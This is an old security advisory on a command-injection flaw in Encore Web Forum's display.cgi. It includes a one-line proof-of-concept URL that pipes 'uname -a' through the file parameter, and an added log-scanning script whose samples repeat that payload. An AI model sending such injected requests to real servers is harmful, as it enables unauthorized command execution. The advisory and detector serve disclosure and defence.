Aborior Encore Web Forum Remote Arbitrary Command Execution Vulnerability
BID:10040
Info
| Bugtraq ID: | 10040 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 03 2004 12:00AM |
| Updated: | Jun 21 2006 09:25PM |
| Credit: | Discovery of this issue is credited to k-159. |
| Vulnerable: | Aborior Encore Web Forum |
| Not Vulnerable: | |
Discussion
Encore Web Forum is reported prone to an issue that may allow a remote user to execute arbitrary commands on a system implementing the forum software. This issue is due to the application's failure to properly validate user-supplied URI input.
A remote attacker may exploit this condition to execute arbitrary commands in the context of the webserver that is hosting the vulnerable application.
Exploit / POC
The following proof of concept has been provided:
http://www.target.com/encore/forumcgi/display.cgi?preftemp=temp&page=anonymous&file=|uname -a|
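A defensive check for the request shape shown above, as an added example that is not part of the original advisory: it scans web server access-log lines for display.cgi requests whose decoded file parameter contains a pipe or other shell metacharacters. The log lines, the metacharacter set and the function name are constructed for illustration, and it assumes legitimate file values are plain names.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: a legitimate "file" value is a plain name, so any of these
# characters (or a ../ sequence) in the decoded value is worth an alert.
SUSPICIOUS = re.compile(r"[|;&`$<>\\\n\r]|\.\./")

# Request line inside a Common Log Format entry: "METHOD target HTTP/x.y"
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def flag_display_cgi_requests(log_lines):
    """Return (line_number, decoded file value) for suspicious display.cgi hits."""
    hits = []
    for line_no, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue
        target = urlsplit(match.group(1))
        if not target.path.lower().endswith("/display.cgi"):
            continue
        # parse_qs percent-decodes, so %7C and a literal | are treated alike.
        params = parse_qs(target.query, keep_blank_values=True)
        for value in params.get("file", []):
            if SUSPICIOUS.search(value):
                hits.append((line_no, value))
    return hits


# Constructed sample log lines (documentation IP ranges, made-up timestamps).
SAMPLE_LOG = [
    '192.0.2.10 - - [03/Apr/2004:10:00:01 +0000] "GET /encore/forumcgi/'
    'display.cgi?preftemp=temp&page=anonymous&file=general HTTP/1.1" 200 5120',
    '198.51.100.7 - - [03/Apr/2004:10:02:13 +0000] "GET /encore/forumcgi/'
    'display.cgi?preftemp=temp&page=anonymous&file=%7Cuname%20-a%7C HTTP/1.1" 200 311',
    '198.51.100.7 - - [03/Apr/2004:10:02:40 +0000] "GET /encore/forumcgi/'
    'display.cgi?preftemp=temp&page=anonymous&file=|uname+-a| HTTP/1.0" 200 311',
    '192.0.2.44 - - [03/Apr/2004:10:03:02 +0000] "GET /index.html HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for line_no, value in flag_display_cgi_requests(SAMPLE_LOG):
        print(f"line {line_no}: suspicious file parameter {value!r}")
```

Only parameters visible in the request line are inspected; POST bodies do not appear in a standard access log and need a separate data source.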
Solution / Fix
References
- Encore Web Forum Home Page (Aborior)
- display.cgi ([email protected])
- Remote Exploit for Aborior's Encore Web Forum ("XNUXER RESEARCH")